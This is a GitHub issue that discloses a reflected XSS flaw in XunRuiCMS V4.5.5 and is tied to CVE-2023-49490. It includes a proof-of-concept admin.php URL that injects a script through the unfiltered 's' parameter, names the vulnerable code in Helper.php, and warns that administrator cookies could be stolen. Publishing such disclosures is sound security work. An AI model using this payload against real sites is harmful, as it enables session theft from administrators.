Hebing123 / cve

0 stars 0 forks source link

XunRuiCMS-V4.5.5 has a reflective XSS vulnerability #9

Open Hebing123 opened 9 months ago

Hebing123 commented 9 months ago

Proof of Concept (POC) http://192.168.160.132:5533/admin.php?c=notice&date_form=1906-10-28&date_to=1906-10-28&field=op_username&keyword=1&m=my_index&s=1%22%3E%3CScRiPt%20%3Ealert(document.cookie)%3C/ScRiPt%3E&submit=

image

If the administrator accesses the link, the Cookie will be stolen.

Details

https://github.com/dayrui/xunruicms/blob/b87e914e0df51f00443bd2a6824a09f504d0a4be/dayrui/Fcms/Core/Helper.php#L2039-L2053

image

image

Directly concatenating S-parameters without filtering results in reflective XSS vulnerabilities.

Hebing123 commented 9 months ago

This is the vulnerability exploitation reference for CVE-2023-49490.